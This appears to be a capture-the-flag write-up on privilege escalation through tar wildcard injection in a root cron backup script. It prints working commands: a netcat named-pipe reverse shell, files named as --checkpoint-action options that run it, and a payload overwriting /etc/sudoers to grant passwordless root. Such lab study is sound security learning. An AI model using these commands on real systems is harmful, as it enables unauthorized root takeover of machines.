Wildcards - Tar

Learnt while tryhackme: skynet

Read Wildcards - Chown first. There are two major techniques of exploiting wildcards with Tar

METHOD 1 => Reverse Shell through Cronjob/Script tampering using Wildcard injection

Our malignant user: kali found that every minute a directory was being backed up in the crontab and a wildcard was being used to back up everything instead of an absolute reference. This was done through a script called "backup.sh"

TAR=> The Linux ‘tar’ stands for tape archive, is used to create Archive and extract the Archive files. tar command in Linux is one of the important command which provides archiving functionality in Linux. We can use Linux tar command to create compressed or uncompressed Archive files and also maintain and modify them.

--checkpoint=<number> => The ‘--checkpoint’ option provides a flexible mechanism for executing arbitrary actions upon hitting checkpoints. The SI units of checkpoints is number of records. 1 record=512 bytes. Thus, after writing 512 bytes, tar hits first checkpoint! Default size if no --checkpoint=<number> option is given is 10 records (5120 bytes) --checkpoint-action=<execute a command> => Instruct tar to execute an action upon hitting a checkpoint. If --checkpoint=1, then checkpoint would be 512 bytes and the action will be executed at 1st checkpoint.(writing 512 bytes). Actions can be: echo, bell, dot, sleep, ttyout, exec (external commands). Refer: https://www.gnu.org/software/tar/manual/html_node/Option-Summary.html#Option-Summary

Example: This command runs echo on completion of 1 checkpoint. tar cf archive.tgz * --checkpoint=1 --checkpoint-action=echo

Now, I will exploit this functionality to escalate privileges. What I need to do is generate an msfvenom reverse shell payload and add this in directory which is being backed up along with our wildcards like so

echo "mkfifo /tmp/wdozem; nc 127.0.0.1 8888 0</tmp/wdozem | /bin/sh >/tmp/wdozem 2>&1; rm /tmp/wdozem" >shell.sh echo "" > '--checkpoint=1' echo "" > '--checkpoint-action=exec=sh shell.sh'

After a minute on our reverse listener... nc -nlvp 8888

ALSO =>The above command executes shell.sh after tar writes 512 bytes (1 record). Since the default is 10 records, if --checkpoint=<> is missing it should execute at reaching 10 records. I inupt a text file (text.txt) which is sufficiently greater than 10 records. Lets see what happens. Example:

As you can see we have received a root shell.

METHOD 2 => Privilege Escalation through tampering sudoers file with tar Wildcard Injection

The sudoers file is a file Linux and Unix administrators use to allocate system rights to system users. This allows the administrator to control who does what. Remember, Linux is built with security in mind. When you want to run a command that requires root rights, Linux checks your username against the sudoers file. This happens when you type the command “sudo”. If it determines, that your username is not on the list, you cannot run the command/program logged in as that user.

In the previous scenario, we had Tar using wildcard in a script that was backing up a directory like so:

Now, we will see method two. Suppose you have victim’s machine as a non-root user you can try to give sudo right to non-root user by adding him sudoers file.

echo 'echo "kali ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > shell.sh

After waiting a minute, we check the sudoers file sudo -l Here, you can see that user kali has been added to the sudoers file now!

I launched a bash shell using sudo command and as you can see, there is no password prompt asked as the user kali's privileges have now been escalated!